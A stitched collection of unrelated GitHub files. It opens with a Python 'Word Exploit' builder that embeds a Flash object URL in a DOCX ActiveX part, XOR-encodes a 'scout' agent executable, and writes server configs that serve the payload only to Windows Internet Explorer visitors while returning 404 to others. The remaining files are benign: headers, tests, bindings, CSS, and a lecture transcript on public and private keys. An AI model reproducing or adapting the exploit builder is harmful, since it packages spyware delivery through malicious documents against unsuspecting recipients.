for x in range(len(swf_url_bytearray)):
ole_link_bytearray[i+y] = swf_url_bytearray[x]
ole_link_bytearray[i+y+1] = 0x0
y += 2
# dump modified ole link
open("tmp/word/activeX/activeX1.bin", 'wb').write(byteArray2String(ole_link_bytearray))
# create docx
cwd = os.getcwd()
os.chdir(cwd + "/tmp")
os.system('zip -r "../{}" *'.format(os.path.basename(docx) ))
os.chdir(cwd)
# create an archive containing the docx
os.system('zip "{}" "{}"'.format(output_file, os.path.basename(docx)))
os.remove(os.path.basename(docx))
shutil.move(output_file + '.zip', output_file)
# write xored scout
open(exe_random_name, 'wb').write(four_byte_xor(open(scout_input_path, 'rb').read(), xor_key))
shutil.move(exe_random_name, os.path.join(target_directory, 'data/'))
# copy xp filter and empty.swf
shutil.copy('resources/empty.swf', os.path.join(target_directory, 'data/') )
shutil.copy('resources/xp_filter.py', os.path.join(target_directory, 'data/') )
os.chmod(os.path.join(target_directory, 'data/xp_filter.py'), 0755)
# --- generate edn configuration ---
baseconfig = {
"general": { "expiry": 0, "hits": 1 },
"valid": { },
"invalid": {"type": 404},
"filters": { 'platform_description': '/windows/i', 'browser': '/^IE$/' },
}
# swf
swf_config = copy.deepcopy(baseconfig)
swf_config['general']['pos'] = 'first'
swf_config['general']['expiry'] = expiry
swf_config['valid']['type'] = 'exec'
#swf_config['valid']['path'] = './{}'.format(swf_random_name)
swf_config['valid']['path'] = './xp_filter.py'
swf_config['valid']['headers[Content-Type]'] = 'application/x-shockwave-flash'
swf_config['related'] = {}
swf_config['related'][exe_random_name] = '+2min'
write_edn_config(target_directory, swf_random_name, swf_config)
# scout
scout_config = copy.deepcopy(baseconfig)
scout_config['general']['pos'] = 'last'
scout_config['valid']['type'] = 'data'
scout_config['valid']['path'] = './{}'.format(exe_random_name)
scout_config['valid']['header[Content-Type]'] = 'application/octet-stream'
scout_config['related'] = {}
write_edn_config(target_directory, exe_random_name, scout_config)
def write_edn_config(target_directory, filename, options):
config = ConfigParser.RawConfigParser()
# Prevent ConfigParser from transforming option names to lowercase
config.optionxform = str
for k in options:
config.add_section(k)
for optk in options[k]:
config.set(k, optk, options[k][optk])
confpath = os.path.join(target_directory, filename + ".ini")
with open(confpath, "w") as fp:
config.write(fp)
print "[*] wrote EDN config file: {}".format(confpath)
# ------- end of build subs -------
# ./build --serveraddr='192.168.0.1' --serverip='192.168.0.1' --basedir='/docs/veryrandomdir/' --outdir='outdir/' --output='output' --t
# ype='worddoc' --expiry='1413469552' --client='CUSTOMER' --type='worddoc' --agent='upload/zip.exe' --document='upload/Doc1.docx'
def main():
random.seed()
# 0] scout_name
# 1] scout input path
# 2] docx input
# 3] docx output path
parser = argparse.ArgumentParser(description='[*] Word Exploit')
parser.add_argument('--outdir', help='exploit destination folder', type=str)
parser.add_argument('--serveraddr', help='server address hostname if available', type=str)
parser.add_argument('--agent', help='input scout', type=str, required=True)
parser.add_argument('--document', help='input docx', type=str, required=True)
parser.add_argument('--output', help='output docx', type=str, required=True)
parser.add_argument('--basedir', help='base directory', type=str, required=True)
parser.add_argument('--expiry', help='expiry date', type=str, required=True)
args, unknown = parser.parse_known_args()
swf_random_name = random_id(12) + '.swf'
exe_random_name = random_id(12) + '.dat'
serveraddr = 'https://' + args.serveraddr
# validate True -> swf served in https, scout https, validate cert
# validate False -> swf served in http, scout https, don't validate cert
validate = True
# extract scout metadata
if platform.system() == 'Windows':
ouch = subprocess.check_output('python ../agentdetect.py --latest "{}"'.format(args.agent), shell=True )
else:
ouch = subprocess.check_output('agentdetect --latest "{}"'.format(args.agent), shell=True )
if ouch.strip() == 'None':
print '[E] scout provided is not up to date'
exit(-1)
scout_data = json.loads(ouch)
if scout_data['type'] != 'scout':
print '[E] executable provided is not a scout'
exit(-1)
scout_name = scout_data['name']
# build the exploit
edn_build(args.outdir, serveraddr, args.basedir, scout_name, args.agent,
args.document, args.output, swf_random_name, exe_random_name, args.expiry, validate)
if __name__ == '__main__':
main()
| {
"pile_set_name": "Github"
} |
27
0 4
0 16
1 5
1 6
2 10
2 6
3 8
6 17
6 19
6 8
7 11
8 12
8 15
9 23
9 25
9 16
11 14
11 15
11 22
12 16
13 16
18 26
20 21
21 23
22 26
23 24
| {
"pile_set_name": "Github"
} |
/* voc 2.1.0 [2019/11/01]. Bootstrapping compiler for address size 8, alignment 8. xrtspaSF */
#ifndef Files__h
#define Files__h
#include "SYSTEM.h"
typedef
struct Files_FileDesc *Files_File;
typedef
struct Files_FileDesc {
INT32 _prvt0;
char _prvt1[568];
} Files_FileDesc;
typedef
struct Files_Rider {
INT32 res;
BOOLEAN eof;
char _prvt0[15];
} Files_Rider;
import INT16 Files_MaxPathLength, Files_MaxNameLength;
import ADDRESS *Files_FileDesc__typ;
import ADDRESS *Files_Rider__typ;
import Files_File Files_Base (Files_Rider *r, ADDRESS *r__typ);
import void Files_ChangeDirectory (CHAR *path, ADDRESS path__len, INT16 *res);
import void Files_Close (Files_File f);
import void Files_Delete (CHAR *name, ADDRESS name__len, INT16 *res);
import void Files_GetDate (Files_File f, INT32 *t, INT32 *d);
import void Files_GetName (Files_File f, CHAR *name, ADDRESS name__len);
import INT32 Files_Length (Files_File f);
import Files_File Files_New (CHAR *name, ADDRESS name__len);
import Files_File Files_Old (CHAR *name, ADDRESS name__len);
import INT32 Files_Pos (Files_Rider *r, ADDRESS *r__typ);
import void Files_Purge (Files_File f);
import void Files_Read (Files_Rider *r, ADDRESS *r__typ, SYSTEM_BYTE *x);
import void Files_ReadBool (Files_Rider *R, ADDRESS *R__typ, BOOLEAN *x);
import void Files_ReadBytes (Files_Rider *r, ADDRESS *r__typ, SYSTEM_BYTE *x, ADDRESS x__len, INT32 n);
import void Files_ReadInt (Files_Rider *R, ADDRESS *R__typ, INT16 *x);
import void Files_ReadLInt (Files_Rider *R, ADDRESS *R__typ, INT32 *x);
import void Files_ReadLReal (Files_Rider *R, ADDRESS *R__typ, LONGREAL *x);
import void Files_ReadLine (Files_Rider *R, ADDRESS *R__typ, CHAR *x, ADDRESS x__len);
import void Files_ReadNum (Files_Rider *R, ADDRESS *R__typ, SYSTEM_BYTE *x, ADDRESS x__len);
import void Files_ReadReal (Files_Rider *R, ADDRESS *R__typ, REAL *x);
import void Files_ReadSet (Files_Rider *R, ADDRESS *R__typ, UINT32 *x);
import void Files_ReadString (Files_Rider *R, ADDRESS *R__typ, CHAR *x, ADDRESS x__len);
import void Files_Register (Files_File f);
import void Files_Rename (CHAR *old, ADDRESS old__len, CHAR *new, ADDRESS new__len, INT16 *res);
import void Files_Set (Files_Rider *r, ADDRESS *r__typ, Files_File f, INT32 pos);
import void Files_SetSearchPath (CHAR *path, ADDRESS path__len);
import void Files_Write (Files_Rider *r, ADDRESS *r__typ, SYSTEM_BYTE x);
import void Files_WriteBool (Files_Rider *R, ADDRESS *R__typ, BOOLEAN x);
import void Files_WriteBytes (Files_Rider *r, ADDRESS *r__typ, SYSTEM_BYTE *x, ADDRESS x__len, INT32 n);
import void Files_WriteInt (Files_Rider *R, ADDRESS *R__typ, INT16 x);
import void Files_WriteLInt (Files_Rider *R, ADDRESS *R__typ, INT32 x);
import void Files_WriteLReal (Files_Rider *R, ADDRESS *R__typ, LONGREAL x);
import void Files_WriteNum (Files_Rider *R, ADDRESS *R__typ, INT64 x);
import void Files_WriteReal (Files_Rider *R, ADDRESS *R__typ, REAL x);
import void Files_WriteSet (Files_Rider *R, ADDRESS *R__typ, UINT32 x);
import void Files_WriteString (Files_Rider *R, ADDRESS *R__typ, CHAR *x, ADDRESS x__len);
import void *Files__init(void);
#endif // Files
| {
"pile_set_name": "Github"
} |
package lager_test
import (
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
"testing"
)
func TestLager(t *testing.T) {
RegisterFailHandler(Fail)
RunSpecs(t, "Lager Suite")
}
| {
"pile_set_name": "Github"
} |
<menu
xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:app="http://schemas.android.com/apk/res-auto"
xmlns:tools="http://schemas.android.com/tools"
tools:context=".MainActivity">
<item
android:id="@+id/action_settings"
android:title="@string/action_settings"
android:orderInCategory="100"
app:showAsAction="never" />
</menu>
| {
"pile_set_name": "Github"
} |
#ifndef crypto_auth_hmacsha512256_H
#define crypto_auth_hmacsha512256_H
#include <stddef.h>
#include "crypto_auth_hmacsha512.h"
#include "export.h"
#ifdef __cplusplus
# ifdef __GNUC__
# pragma GCC diagnostic ignored "-Wlong-long"
# endif
extern "C" {
#endif
#define crypto_auth_hmacsha512256_BYTES 32U
SODIUM_EXPORT
size_t crypto_auth_hmacsha512256_bytes(void);
#define crypto_auth_hmacsha512256_KEYBYTES 32U
SODIUM_EXPORT
size_t crypto_auth_hmacsha512256_keybytes(void);
SODIUM_EXPORT
int crypto_auth_hmacsha512256(unsigned char *out, const unsigned char *in,
unsigned long long inlen,const unsigned char *k);
SODIUM_EXPORT
int crypto_auth_hmacsha512256_verify(const unsigned char *h,
const unsigned char *in,
unsigned long long inlen,
const unsigned char *k)
__attribute__ ((warn_unused_result));
/* ------------------------------------------------------------------------- */
typedef crypto_auth_hmacsha512_state crypto_auth_hmacsha512256_state;
SODIUM_EXPORT
size_t crypto_auth_hmacsha512256_statebytes(void);
SODIUM_EXPORT
int crypto_auth_hmacsha512256_init(crypto_auth_hmacsha512256_state *state,
const unsigned char *key,
size_t keylen);
SODIUM_EXPORT
int crypto_auth_hmacsha512256_update(crypto_auth_hmacsha512256_state *state,
const unsigned char *in,
unsigned long long inlen);
SODIUM_EXPORT
int crypto_auth_hmacsha512256_final(crypto_auth_hmacsha512256_state *state,
unsigned char *out);
SODIUM_EXPORT
void crypto_auth_hmacsha512256_keygen(unsigned char k[crypto_auth_hmacsha512256_KEYBYTES]);
#ifdef __cplusplus
}
#endif
#endif
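/*
 * Usage sketch, not part of libsodium: the snippet below exercises only the
 * functions declared above (plus sodium_init() from sodium.h), comparing the
 * one-shot call with the multi-part init/update/final sequence. It assumes a
 * C++ program that links against libsodium.
 */
#include <sodium.h>
#include <cstdio>
#include <cstring>

int main()
{
    if (sodium_init() < 0)
        return 1;                          /* library unavailable */

    unsigned char key[crypto_auth_hmacsha512256_KEYBYTES];
    crypto_auth_hmacsha512256_keygen(key);

    const unsigned char msg[] = "message to authenticate";

    /* one-shot: 32-byte authentication tag over the whole message */
    unsigned char tag[crypto_auth_hmacsha512256_BYTES];
    crypto_auth_hmacsha512256(tag, msg, sizeof msg, key);

    /* multi-part: useful when the input arrives in chunks */
    crypto_auth_hmacsha512256_state st;
    unsigned char tag2[crypto_auth_hmacsha512256_BYTES];
    crypto_auth_hmacsha512256_init(&st, key, sizeof key);
    crypto_auth_hmacsha512256_update(&st, msg, sizeof msg);
    crypto_auth_hmacsha512256_final(&st, tag2);

    /* verification recomputes the tag and compares it in constant time */
    if (crypto_auth_hmacsha512256_verify(tag, msg, sizeof msg, key) != 0)
        return 1;                          /* tag rejected */

    std::printf("one-shot and multi-part tags match: %d\n",
                std::memcmp(tag, tag2, sizeof tag) == 0);
    return 0;
}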
| {
"pile_set_name": "Github"
} |
00:01 We've had a chance to play around with Git and take a look at the basic settings on GitHub,
00:04 but in order to go further with our projects,
00:06 we are going to need to setup public and private keys, also known as asymmetric keys.
00:10 Asymmetric keys are a computer science concept for encryption and authorization,
00:14 in the next few videos we'll create our public and private keys
00:17 but let's take a look at the basic concepts behind them.
00:20 Let's say you've got a message or a piece of data you want to share with someone
00:23 and you don't want anyone else, even if they intercept it,
00:26 to be able to understand what's in that message,
00:28 you can use a public key as long as the party that you are sending to
00:31 has the appropriate private key that matches with that public key
00:34 and you can use the public key to encrypt that message or data,
00:37 only the party with the private key will be able to decrypt that data.
00:40 A public key can be shared freely, posted on the internet, wherever,
00:43 it doesn't matter if it gets out in the open, in fact, it's better if it's out in the open,
00:47 because then people can use to send you messages as long as you have the private key.
00:51 The private key is the counterpart, it's used not only to decrypt that data
00:55 that is encrypted with the public key,
00:58 but also to sign messages and to validate you are who you say you are
01:01 based on the fact that you own this private key,
01:04 you will never want to share your private key
01:06 and if you ever think that your private key has been compromised
01:09 you are going to want to regenerate both the public and private key.
01:12 Here is how encrypting and decrypting messages with asymmetric keys works,
01:16 let's say you've got a message in plain text,
01:19 you can use the public key to encrypt that message,
01:22 so when you take a look at it, it looks like just a bunch of garbage,
01:25 but inside that supposed garbage lies the message
01:28 that was originally plain text that was encrypted.
01:31 Only the owner of the private key can decrypt the message and extract the plain text.
01:36 This is how one way encryption works, with asymmetric keys,
01:39 the public key does the encryption, the private key does the decryption.
01:43 There is a counter part to this which is if you have the private key
01:46 you can use that to identify yourself and use it as authorization,
01:49 and this is what we need to do on GitHub in order to specify who we are.
01:54 We can use the private key to identify I am who I say I am,
01:57 because I have this private key, and it says the public key is out in the open
02:01 anybody should be able to confirm that you have the valid identity
02:04 based off of a message that you've signed with your private key.
02:07 Let's say you have a message and you use your private key to sign it,
02:10 then anyone can take that message signature and confirm your identity
02:13 based off of the public key, so that's the second bit associated with asymmetric keys.
02:18 The private key can be used for authorization,
02:21 in addition to the public key being used for encryption.
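To make the recap that follows concrete, here is a minimal sketch of both operations using libsodium's sealed boxes and detached signatures. The library choice is an assumption of this example (the video never names one, and GitHub's SSH keys use a different key format); it only illustrates encrypt-with-public/decrypt-with-private and sign-with-private/verify-with-public.

// Illustration only: libsodium is an assumed dependency, not something the video uses.
#include <sodium.h>
#include <cstdio>

int main()
{
    if (sodium_init() < 0)
        return 1;                                        // library failed to start

    // Encryption: anyone holding the public key can encrypt,
    // only the owner of the matching private key can decrypt.
    unsigned char enc_pk[crypto_box_PUBLICKEYBYTES];
    unsigned char enc_sk[crypto_box_SECRETKEYBYTES];
    crypto_box_keypair(enc_pk, enc_sk);

    const unsigned char msg[] = "plain text message";
    unsigned char sealed[crypto_box_SEALBYTES + sizeof msg];
    crypto_box_seal(sealed, msg, sizeof msg, enc_pk);    // encrypt with the public key

    unsigned char opened[sizeof msg];
    if (crypto_box_seal_open(opened, sealed, sizeof sealed, enc_pk, enc_sk) != 0)
        return 1;                                        // only enc_sk can open it

    // Signing: only the owner of the private key can sign,
    // anyone holding the public key can verify the signature.
    unsigned char sig_pk[crypto_sign_PUBLICKEYBYTES];
    unsigned char sig_sk[crypto_sign_SECRETKEYBYTES];
    crypto_sign_keypair(sig_pk, sig_sk);

    unsigned char sig[crypto_sign_BYTES];
    crypto_sign_detached(sig, nullptr, msg, sizeof msg, sig_sk);

    if (crypto_sign_verify_detached(sig, msg, sizeof msg, sig_pk) != 0)
        return 1;                                        // signature rejected

    std::puts("decrypted and verified");
    return 0;
}

Note that only the public halves (enc_pk and sig_pk) ever need to leave your machine; the private halves stay with you.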
02:24 Just to recap, public keys can be used to encrypt messages and data,
02:28 and they can only be decrypted by that private key;
02:31 a private key can be used for identification,
02:34 I am who I say I am because I own this private key,
02:36 I am the only one who controls it, and that can be confirmed and validated by the public key,
02:41 so that's a really high level overview of asymmetric keys
02:44 and how public keys are used to encrypt data,
02:47 and private keys are used to sign messages and authorize identity. | {
"pile_set_name": "Github"
} |
include '../../../types.pxi'
from libcpp cimport bool
from libcpp.vector cimport vector
from cython.operator cimport dereference as deref
from quantlib.handle cimport Handle, shared_ptr, static_pointer_cast
from quantlib.math.optimization cimport OptimizationMethod, EndCriteria
from quantlib.indexes.swap_index cimport SwapIndex
from quantlib._defines cimport QL_NULL_REAL
from quantlib.quotes cimport SimpleQuote
from quantlib.time.date cimport Period
from quantlib.time._period cimport Period as QlPeriod
from .swaption_vol_structure cimport SwaptionVolatilityStructure
from . cimport _swaption_vol_cube1 as _svc1
cimport quantlib.indexes._swap_index as _si
from . cimport _swaption_vol_structure as _svs
from ..._vol_term_structure cimport VolatilityTermStructure
cimport quantlib._quote as _qt
cdef class SwaptionVolCube1(SwaptionVolatilityCube):
def __init__(self, SwaptionVolatilityStructure atm_vol_structure not None,
list option_tenors not None,
list swap_tenors not None,
vector[Spread] strike_spreads,
list vol_spreads not None,
SwapIndex swap_index_base not None,
SwapIndex short_swap_index_base not None,
bool vega_weighted_smile_fit,
list parameters_guess not None,
vector[bool] is_parameter_fixed,
bool is_atm_calibrated,
EndCriteria end_criteria not None=EndCriteria.__new__(EndCriteria),
Real max_error_tolerance=QL_NULL_REAL,
OptimizationMethod opt_method not None=OptimizationMethod(),
Real error_accept=QL_NULL_REAL,
bool use_max_error=False,
Size max_guesses=50,
bool backward_flat=False,
Real cutoff_strike=0.0001):
cdef:
Handle[_svs.SwaptionVolatilityStructure] atm_vol_structure_handle = \
Handle[_svs.SwaptionVolatilityStructure](
static_pointer_cast[_svs.SwaptionVolatilityStructure](
atm_vol_structure._thisptr))
vector[QlPeriod] option_tenors_vec
vector[QlPeriod] swap_tenors_vec
Period p
SimpleQuote q
vector[vector[Handle[_qt.Quote]]] vol_spreads_matrix
vector[vector[Handle[_qt.Quote]]] parameters_guess_matrix
list l
for l in vol_spreads:
vol_spreads_matrix.push_back(vector[Handle[_qt.Quote]]())
for q in l:
vol_spreads_matrix.back().push_back(Handle[_qt.Quote](q._thisptr))
for l in parameters_guess:
parameters_guess_matrix.push_back(vector[Handle[_qt.Quote]]())
for q in l:
(parameters_guess_matrix.
back().
push_back(Handle[_qt.Quote](q._thisptr)))
for p in option_tenors:
option_tenors_vec.push_back(deref(p._thisptr))
for p in swap_tenors:
swap_tenors_vec.push_back(deref(p._thisptr))
self._thisptr = shared_ptr[VolatilityTermStructure](
new _svc1.SwaptionVolCube1(
atm_vol_structure_handle,
option_tenors_vec,
swap_tenors_vec,
strike_spreads,
vol_spreads_matrix,
static_pointer_cast[_si.SwapIndex](swap_index_base._thisptr),
static_pointer_cast[_si.SwapIndex](short_swap_index_base._thisptr),
vega_weighted_smile_fit,
parameters_guess_matrix,
is_parameter_fixed,
is_atm_calibrated,
end_criteria._thisptr,
max_error_tolerance,
opt_method._thisptr,
error_accept,
use_max_error,
max_guesses,
backward_flat,
cutoff_strike))
| {
"pile_set_name": "Github"
} |
#
#Thu Nov 28 15:12:32 CST 2019
category.img=\u7F29\u7565\u56FE
appid=\u6587\u7AE0\u7BA1\u7406\u7684\u5E94\u7528id
content.datetime=\u53D1\u5E03\u65F6\u95F4
category.manager.id=\u53D1\u5E03\u7528\u6237id
category.title=\u680F\u76EE\u7BA1\u7406\u540D\u79F0
category.keyword=\u680F\u76EE\u7BA1\u7406\u5173\u952E\u5B57
content.img=\u6587\u7AE0\u7F29\u7565\u56FE
category.path=\u680F\u76EE\u8DEF\u5F84
content.type=\u6587\u7AE0\u7C7B\u578B
category.url=\u5185\u5BB9\u6A21\u677F
dict.id=\u5B57\u5178\u5BF9\u5E94\u7F16\u53F7
content.author=\u6587\u7AE0\u4F5C\u8005
category.parent.id=\u7236\u7C7B\u578B\u7F16\u53F7
category.datetime=\u7C7B\u522B\u53D1\u5E03\u65F6\u95F4
category.flag=\u680F\u76EE\u5C5E\u6027
content.description=\u63CF\u8FF0
content.url=\u6587\u7AE0\u8DF3\u8F6C\u94FE\u63A5\u5730\u5740
category.sort=\u81EA\u5B9A\u4E49\u987A\u5E8F
content.title=\u6587\u7AE0\u6807\u9898
content.category.id=\u6240\u5C5E\u680F\u76EE
id=\u7F16\u53F7
app.id=\u5E94\u7528\u7F16\u53F7
category.list.url=\u5217\u8868\u6A21\u677F
mdiy.model.id=\u680F\u76EE\u7BA1\u7406\u7684\u5185\u5BB9\u6A21\u578Bid
content.source=\u6587\u7AE0\u6765\u6E90
content.display=\u662F\u5426\u663E\u793A
category.type=\u680F\u76EE\u7BA1\u7406\u5C5E\u6027
category.descrip=\u680F\u76EE\u7BA1\u7406\u63CF\u8FF0
content.details=\u6587\u7AE0\u5185\u5BB9
category.id=\u6240\u5C5E\u680F\u76EE
content.sort=\u81EA\u5B9A\u4E49\u987A\u5E8F
category.diy.url=\u81EA\u5B9A\u4E49\u94FE\u63A5
content.keyword=\u5173\u952E\u5B57
templet.file=\u672A\u627E\u5230\u6A21\u677F\u6587\u4EF6
| {
"pile_set_name": "Github"
} |
/*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.prestosql.type;
import io.airlift.slice.Slice;
import io.airlift.slice.Slices;
import io.prestosql.spi.block.Block;
import io.prestosql.spi.block.BlockBuilder;
import io.prestosql.spi.connector.ConnectorSession;
import io.prestosql.spi.type.AbstractVariableWidthType;
import io.prestosql.spi.type.TypeSignature;
public class CodePointsType
extends AbstractVariableWidthType
{
public static final CodePointsType CODE_POINTS = new CodePointsType();
public static final String NAME = "CodePoints";
private CodePointsType()
{
super(new TypeSignature(NAME), int[].class);
}
@Override
public Object getObjectValue(ConnectorSession session, Block block, int position)
{
throw new UnsupportedOperationException();
}
@Override
public void appendTo(Block block, int position, BlockBuilder blockBuilder)
{
throw new UnsupportedOperationException();
}
@Override
public Object getObject(Block block, int position)
{
if (block.isNull(position)) {
return null;
}
Slice slice = block.getSlice(position, 0, block.getSliceLength(position));
int[] codePoints = new int[slice.length() / Integer.BYTES];
slice.getBytes(0, Slices.wrappedIntArray(codePoints));
return codePoints;
}
@Override
public void writeObject(BlockBuilder blockBuilder, Object value)
{
Slice slice = Slices.wrappedIntArray((int[]) value);
blockBuilder.writeBytes(slice, 0, slice.length()).closeEntry();
}
}
| {
"pile_set_name": "Github"
} |
# Copyright (c) 2000-2002 IBM, Inc. and others
# sample code makefile
# Usage:
# - configure, build, install ICU (make install)
# - make sure "icu-config" (in the ICU installed bin directory) is on
# the path
# - do 'make' in this directory
#### definitions
# Name of your target
TARGET=msgfmt
# All object files (C or C++)
OBJECTS=main.o util.o
#### rules
# Load in standard makefile definitions
include ../defs.mk
# the actual rules (this is a simple sample)
include ../rules.mk
| {
"pile_set_name": "Github"
} |
/////////////////////////////////////////////////////////////////////////////
// Name: wx/richtext/richtextindentspage.h
// Purpose: Declares the rich text formatting dialog indent page.
// Author: Julian Smart
// Modified by:
// Created: 10/3/2006 2:28:21 PM
// Copyright: (c) Julian Smart
// Licence: wxWindows licence
/////////////////////////////////////////////////////////////////////////////
#ifndef _RICHTEXTINDENTSPAGE_H_
#define _RICHTEXTINDENTSPAGE_H_
/*!
* Includes
*/
#include "wx/richtext/richtextdialogpage.h"
////@begin includes
#include "wx/statline.h"
////@end includes
/*!
* Forward declarations
*/
////@begin forward declarations
class wxRichTextCtrl;
////@end forward declarations
/*!
* Control identifiers
*/
////@begin control identifiers
#define SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_STYLE wxRESIZE_BORDER|wxTAB_TRAVERSAL
#define SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_TITLE wxEmptyString
#define SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_IDNAME ID_RICHTEXTINDENTSSPACINGPAGE
#define SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_SIZE wxSize(400, 300)
#define SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_POSITION wxDefaultPosition
////@end control identifiers
/*!
* wxRichTextIndentsSpacingPage class declaration
*/
class WXDLLIMPEXP_RICHTEXT wxRichTextIndentsSpacingPage: public wxRichTextDialogPage
{
wxDECLARE_DYNAMIC_CLASS(wxRichTextIndentsSpacingPage);
wxDECLARE_EVENT_TABLE();
DECLARE_HELP_PROVISION()
public:
/// Constructors
wxRichTextIndentsSpacingPage( );
wxRichTextIndentsSpacingPage( wxWindow* parent, wxWindowID id = wxID_ANY, const wxPoint& pos = SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_POSITION, const wxSize& size = SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_SIZE, long style = SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_STYLE );
/// Creation
bool Create( wxWindow* parent, wxWindowID id = wxID_ANY, const wxPoint& pos = SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_POSITION, const wxSize& size = SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_SIZE, long style = SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_STYLE );
/// Initialise members
void Init();
/// Creates the controls and sizers
void CreateControls();
/// Transfer data from/to window
virtual bool TransferDataFromWindow() wxOVERRIDE;
virtual bool TransferDataToWindow() wxOVERRIDE;
/// Updates the paragraph preview
void UpdatePreview();
/// Gets the attributes associated with the main formatting dialog
wxRichTextAttr* GetAttributes();
////@begin wxRichTextIndentsSpacingPage event handler declarations
/// wxEVT_COMMAND_RADIOBUTTON_SELECTED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_ALIGNMENT_LEFT
void OnAlignmentLeftSelected( wxCommandEvent& event );
/// wxEVT_COMMAND_RADIOBUTTON_SELECTED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_ALIGNMENT_RIGHT
void OnAlignmentRightSelected( wxCommandEvent& event );
/// wxEVT_COMMAND_RADIOBUTTON_SELECTED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_ALIGNMENT_JUSTIFIED
void OnAlignmentJustifiedSelected( wxCommandEvent& event );
/// wxEVT_COMMAND_RADIOBUTTON_SELECTED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_ALIGNMENT_CENTRED
void OnAlignmentCentredSelected( wxCommandEvent& event );
/// wxEVT_COMMAND_RADIOBUTTON_SELECTED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_ALIGNMENT_INDETERMINATE
void OnAlignmentIndeterminateSelected( wxCommandEvent& event );
/// wxEVT_COMMAND_TEXT_UPDATED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_INDENT_LEFT
void OnIndentLeftUpdated( wxCommandEvent& event );
/// wxEVT_COMMAND_TEXT_UPDATED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_INDENT_LEFT_FIRST
void OnIndentLeftFirstUpdated( wxCommandEvent& event );
/// wxEVT_COMMAND_TEXT_UPDATED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_INDENT_RIGHT
void OnIndentRightUpdated( wxCommandEvent& event );
/// wxEVT_COMMAND_COMBOBOX_SELECTED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_OUTLINELEVEL
void OnRichtextOutlinelevelSelected( wxCommandEvent& event );
/// wxEVT_COMMAND_TEXT_UPDATED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_SPACING_BEFORE
void OnSpacingBeforeUpdated( wxCommandEvent& event );
/// wxEVT_COMMAND_TEXT_UPDATED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_SPACING_AFTER
void OnSpacingAfterUpdated( wxCommandEvent& event );
/// wxEVT_COMMAND_COMBOBOX_SELECTED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_SPACING_LINE
void OnSpacingLineSelected( wxCommandEvent& event );
////@end wxRichTextIndentsSpacingPage event handler declarations
////@begin wxRichTextIndentsSpacingPage member function declarations
/// Retrieves bitmap resources
wxBitmap GetBitmapResource( const wxString& name );
/// Retrieves icon resources
wxIcon GetIconResource( const wxString& name );
////@end wxRichTextIndentsSpacingPage member function declarations
/// Should we show tooltips?
static bool ShowToolTips();
////@begin wxRichTextIndentsSpacingPage member variables
wxRadioButton* m_alignmentLeft;
wxRadioButton* m_alignmentRight;
wxRadioButton* m_alignmentJustified;
wxRadioButton* m_alignmentCentred;
wxRadioButton* m_alignmentIndeterminate;
wxTextCtrl* m_indentLeft;
wxTextCtrl* m_indentLeftFirst;
wxTextCtrl* m_indentRight;
wxComboBox* m_outlineLevelCtrl;
wxTextCtrl* m_spacingBefore;
wxTextCtrl* m_spacingAfter;
wxComboBox* m_spacingLine;
wxCheckBox* m_pageBreakCtrl;
wxRichTextCtrl* m_previewCtrl;
/// Control identifiers
enum {
ID_RICHTEXTINDENTSSPACINGPAGE = 10100,
ID_RICHTEXTINDENTSSPACINGPAGE_ALIGNMENT_LEFT = 10102,
ID_RICHTEXTINDENTSSPACINGPAGE_ALIGNMENT_RIGHT = 10110,
ID_RICHTEXTINDENTSSPACINGPAGE_ALIGNMENT_JUSTIFIED = 10111,
ID_RICHTEXTINDENTSSPACINGPAGE_ALIGNMENT_CENTRED = 10112,
ID_RICHTEXTINDENTSSPACINGPAGE_ALIGNMENT_INDETERMINATE = 10101,
ID_RICHTEXTINDENTSSPACINGPAGE_INDENT_LEFT = 10103,
ID_RICHTEXTINDENTSSPACINGPAGE_INDENT_LEFT_FIRST = 10104,
ID_RICHTEXTINDENTSSPACINGPAGE_INDENT_RIGHT = 10113,
ID_RICHTEXTINDENTSSPACINGPAGE_OUTLINELEVEL = 10105,
ID_RICHTEXTINDENTSSPACINGPAGE_SPACING_BEFORE = 10114,
ID_RICHTEXTINDENTSSPACINGPAGE_SPACING_AFTER = 10116,
ID_RICHTEXTINDENTSSPACINGPAGE_SPACING_LINE = 10115,
ID_RICHTEXTINDENTSSPACINGPAGE_PAGEBREAK = 10106,
ID_RICHTEXTINDENTSSPACINGPAGE_PREVIEW_CTRL = 10109
};
////@end wxRichTextIndentsSpacingPage member variables
bool m_dontUpdate;
};
#endif
// _RICHTEXTINDENTSPAGE_H_
| {
"pile_set_name": "Github"
} |
#redactor-modal {
position: fixed;
top: 0;
left: 0;
bottom: 0;
right: 0;
overflow-x: hidden;
overflow-y: auto;
z-index: $z-index-modal;
font-family: $base-font-family;
line-height: 24px;
}
.redactor-modal {
position: relative;
margin: 16px auto;
padding: 0;
background: #fff;
box-shadow: 0 0 0 1px rgba(0, 0, 0, .07), 0 2px 15px rgba(80, 80, 80, .25);
border-radius: 3px;
color: #000;
& form {
margin: 0;
padding: 0;
